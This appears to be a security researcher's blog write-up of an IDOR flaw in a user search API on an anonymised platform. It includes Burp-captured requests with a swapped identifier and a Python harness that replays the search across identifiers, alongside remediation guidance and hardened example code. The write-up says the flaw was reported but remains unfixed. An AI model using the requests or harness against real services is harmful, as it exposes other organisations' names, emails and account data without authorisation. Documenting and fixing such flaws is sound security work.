Critical IDOR Vulnerability Exposing Users Details via API Search Endpoint

Assalam o Walikum folks,

Welcome to my blog! I’m thrilled to present my first detailed write-up, which dives deep into a critical vulnerability I uncovered during a recent pentest project. As an ethical hacker with a deep-seated passion for security, I specialize in identifying and mitigating various vulnerabilities, including SQL injection, Insecure Direct Object Reference (IDOR), privilege escalation, and more, with a particular focus on API testing.

Let’s dive into the technical details of this discovery.

Vulnerability Summary

During a routine security assessment of the Target security platform, I uncovered a critical vulnerability categorized as Insecure Direct Object Reference (IDOR). This flaw has severe implications for the security and privacy of user data on the platform. It allows an authenticated standard user to retrieve information belonging to users of other organizations simply by changing the identifier in the path of the user search API endpoint; the server looks the identifier up without checking that the caller belongs to that organization. The exposed data includes names, email addresses, job functions, locations, and account statuses, so the issue could lead to a large-scale data breach affecting both user privacy and organizational security.

What is IDOR?

Insecure Direct Object Reference (IDOR) is an access control vulnerability that occurs when an application uses a client-supplied identifier (a user ID, an order number, a file name) to look up an object such as a database record or a file, without checking that the requester is authorized to access that object. The root cause is a missing or incomplete authorization check on the server, not merely weak input validation: the identifier can be perfectly well-formed and the request will still succeed. By modifying the parameter, an attacker gains unauthorized access to data or performs actions they are not permitted to perform.

For example, if an API endpoint accepts a user ID to fetch user details and the server never verifies that the authenticated caller is allowed to view that user, an attacker can change the user ID parameter to retrieve other users' details. Because numeric IDs are usually sequential, enumerating them is trivial.

Vulnerability Details

  • Vulnerability Type: Insecure Direct Object Reference (IDOR)
  • Severity: Critical
  • Affected Endpoint: /api/core/v1/users/search/{user_id}?_={timestamp}&page=1&pageSize=20

Steps to Reproduce

  1. Log in as a standard user.

  2. Capture the search request:

    • Use Burp Suite to intercept the API request issued by the user list page:

GET /api/core/v1/users/search/101080?_=1719741169465&page=1&pageSize=20 HTTP/2
Host: security.target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://security.target.com/platform/Org/1035/User/List/RO?NewUserId=101080
Authorization: Bearer <your_jwt_token>
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: application/json
Expires: 0
Pragma: no-cache
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

  3. Modify the identifier:

    • Change the identifier in the path of the captured request from 101080 to a different organization's ID, such as 1026.

  4. Resend the modified request:

    • Send the modified request and observe:
GET /api/core/v1/users/search/1026?_=1719741169465&page=1&pageSize=20 HTTP/2
Host: security.target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://security.target.com/platform/Org/1035/User/List/RO?NewUserId=101080
Authorization: Bearer <your_jwt_token>
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: application/json
Expires: 0
Pragma: no-cache
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

  5. Observe the response:

    • The response lists every user in the organization with ID 1026, including names, email addresses, job functions, locations, and account statuses, even though the requesting account is a standard user of a different organization.
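The reproduction above can be scripted so that every candidate identifier is checked the same way. The following is an added example, not code from the original write-up or from the platform: a small Python harness that replays the search request for a list of identifiers and flags any response containing records that belong to an organization other than the tester's own. The base URL and path are taken from the captured request; the response schema (an `items` list whose entries carry an `orgId` field), the `own_org` value and the sample responses in `FAKE_API` are constructed assumptions for illustration and must be adjusted to what the target actually returns.

```python
import json
import time
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Tuple

# Base URL and path shape taken from the captured request in the write-up.
BASE = "https://security.target.com"
PATH = "/api/core/v1/users/search/{ident}?_={ts}&page=1&pageSize=20"

# A transport takes (url, headers) and returns (status, body).
Transport = Callable[[str, Dict[str, str]], Tuple[int, str]]


def http_transport(url: str, headers: Dict[str, str]) -> Tuple[int, str]:
    """Live transport. Use only against a target you are authorized to test."""
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def check_idor(ids: List[str], own_org: int, token: str,
               transport: Transport, delay: float = 0.0) -> List[dict]:
    """Replay the search for each identifier and report responses that contain
    user records outside the tester's own organization.

    Assumption (hypothetical): a 200 response is JSON with an "items" list
    whose entries carry an "orgId" field."""
    headers = {"Authorization": f"Bearer {token}", "Accept": "application/json"}
    findings = []
    for ident in ids:
        url = BASE + PATH.format(ident=ident, ts=int(time.time() * 1000))
        status, body = transport(url, headers)
        if status == 200:
            try:
                data = json.loads(body)
            except ValueError:
                data = {}
            items = data.get("items", []) if isinstance(data, dict) else []
            # Anything not tagged with our own org is a leak (a missing orgId
            # is treated as foreign so it is never silently ignored).
            foreign = [u for u in items
                       if isinstance(u, dict) and u.get("orgId") != own_org]
            if foreign:
                findings.append({
                    "ident": ident,
                    "foreign_records": len(foreign),
                    "foreign_orgs": sorted({u.get("orgId") for u in foreign}, key=str),
                })
        if delay:
            time.sleep(delay)
    return findings


# Constructed responses standing in for the live API so the harness can be
# dry-run offline: 1035 plays the tester's org, 1026 the foreign one.
FAKE_API = {
    "101080": (200, {"items": [
        {"id": 101080, "orgId": 1035, "email": "tester@example.org"}]}),
    "1026": (200, {"items": [
        {"id": 7001, "orgId": 1026, "email": "alice@other.example"},
        {"id": 7002, "orgId": 1026, "email": "bob@other.example"}]}),
    "9999": (403, {"error": "forbidden"}),
}


def fake_transport(url: str, headers: Dict[str, str]) -> Tuple[int, str]:
    """Offline transport that answers from FAKE_API."""
    ident = url.split("/search/", 1)[1].split("?", 1)[0]
    status, payload = FAKE_API.get(ident, (404, {"error": "not found"}))
    return status, json.dumps(payload)


if __name__ == "__main__":
    for hit in check_idor(["101080", "1026", "9999"], own_org=1035,
                          token="<your_jwt_token>", transport=fake_transport):
        print(f"IDOR: /users/search/{hit['ident']} returned "
              f"{hit['foreign_records']} record(s) from org(s) {hit['foreign_orgs']}")
```

The transport is injectable, so the same logic runs offline against the constructed responses for a dry run and against `http_transport` for a live test. Keep `delay` non-zero against production systems and stay within the scope you have been authorized to test; the point of the harness is to confirm the single finding, not to harvest data.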

IMPACT

The exploitation of this vulnerability allows attackers to:
  1. Gain unauthorized access to sensitive user data across different organizations.
  2. Collect extensive personal information such as names, email addresses, job functions, locations, and account statuses.
  3. Enumerate the sequential numeric identifiers to harvest user data from every organization on the platform.

Such access can lead to major data breaches, posing significant privacy and security risks to both individual users and the organization as a whole.

Detailed Remediation

To address and mitigate this vulnerability, the following steps should be implemented:

  • Enforce Server-Side Authorization on Every Object Access: before returning data, check that the authenticated caller belongs to the organization whose users are being requested, using the identity from the session or token rather than anything in the URL.
  • Use Indirect or Unguessable Object References: map each real ID to a per-session opaque handle, or use random identifiers such as UUIDs, so that IDs cannot be enumerated. This is defense in depth and does not replace the authorization check.
  • Validate Input Parameters: reject malformed identifiers on the server side. Validation alone does not prevent IDOR, since a well-formed ID belonging to another organization is still valid input, but it narrows the attack surface.
  • Implement Role-Based Access Control (RBAC): apply the principle of least privilege so that a standard user can read only the data that role requires.
  • Minimize Data in API Responses: return only the fields the user list screen needs rather than the full user record.
  • Enable Logging and Monitoring: log denied and cross-organization access attempts, alert when a single token requests many distinct organization IDs in a short period, and review the logs regularly.
  • User Education: inform users about the risks of URL tampering and give them a channel for reporting suspected security issues.

By adopting these measures, Target can significantly enhance its security posture and safeguard user data from unauthorized access.
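To make the missing check concrete, here is an added example (my own illustration, not the platform's code) that models the search endpoint described in the "What is IDOR?" section and the fixes in the remediation list: the vulnerable lookup, a hardened version that authorizes against the session's organization, minimizes the returned fields and records denied attempts, and a per-session indirect reference map. The `User` record, the directory contents and the function names are constructed for the example.

```python
import secrets
from dataclasses import dataclass, asdict
from typing import Dict, List, Optional


@dataclass(frozen=True)
class User:
    id: int
    org_id: int
    name: str
    email: str
    job_function: str
    status: str


# Constructed directory: org 1035 stands for the tester's own organization,
# org 1026 for the foreign organization whose users were exposed.
DIRECTORY: Dict[int, User] = {u.id: u for u in [
    User(101080, 1035, "Tester", "tester@example.org", "Analyst", "active"),
    User(7001, 1026, "Alice", "alice@other.example", "Administrator", "active"),
    User(7002, 1026, "Bob", "bob@other.example", "Engineer", "disabled"),
]}


class AccessDenied(Exception):
    pass


def search_users_vulnerable(requester: User, org_id: int) -> List[dict]:
    """BEFORE: the organization id comes straight from the URL and drives the
    query; nothing checks that the caller is a member of that organization."""
    return [asdict(u) for u in DIRECTORY.values() if u.org_id == org_id]


def search_users_fixed(requester: User, org_id: int, audit: List[str]) -> List[dict]:
    """AFTER: authorize from the authenticated session (requester.org_id), not
    from the client-controlled identifier; log the denial; return only the
    fields the user list needs."""
    if org_id != requester.org_id:
        audit.append(f"DENY user={requester.id} own_org={requester.org_id} "
                     f"requested_org={org_id}")
        raise AccessDenied("caller is not a member of the requested organization")
    return [{"id": u.id, "name": u.name, "status": u.status}
            for u in DIRECTORY.values() if u.org_id == org_id]


class ReferenceMap:
    """Per-session indirect references: the client only ever sees an opaque
    handle and the server maps it back to the real id. A guessed or forged
    handle resolves to None. Defense in depth only; the membership check in
    search_users_fixed is still required."""

    def __init__(self) -> None:
        self._to_real: Dict[str, int] = {}
        self._to_handle: Dict[int, str] = {}

    def handle_for(self, real_id: int) -> str:
        if real_id not in self._to_handle:
            handle = secrets.token_urlsafe(16)
            self._to_handle[real_id] = handle
            self._to_real[handle] = real_id
        return self._to_handle[real_id]

    def resolve(self, handle: str) -> Optional[int]:
        return self._to_real.get(handle)


if __name__ == "__main__":
    me = DIRECTORY[101080]  # standard user of org 1035
    print("vulnerable:", search_users_vulnerable(me, 1026))  # leaks org 1026
    log: List[str] = []
    try:
        search_users_fixed(me, 1026, log)
    except AccessDenied as denied:
        print("fixed:", denied, "|", log[-1])
    print("own org:", search_users_fixed(me, 1035, log))
    refs = ReferenceMap()
    handle = refs.handle_for(me.org_id)
    print("handle", handle, "->", refs.resolve(handle),
          "| forged ->", refs.resolve("AAAA"))
```

The decisive line is the comparison against `requester.org_id`: the organization comes from the authenticated principal, and the URL value is only accepted when it agrees. The reference map on its own would stop enumeration of `1026`, but a leaked or shared handle would still work without that check, which is why the list above treats it as defense in depth.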

Timeline

  • Date Discovered: 5 July 2024
  • Date Reported: 5 July 2024
  • Date Fixed: Not Fixed

Reporter Information

Thank you for reading my detailed write-up. I hope this information helps in understanding the critical nature of IDOR vulnerabilities and the importance of implementing robust security controls to protect sensitive user data. Stay tuned for more updates and insights into the world of security research and ethical hacking.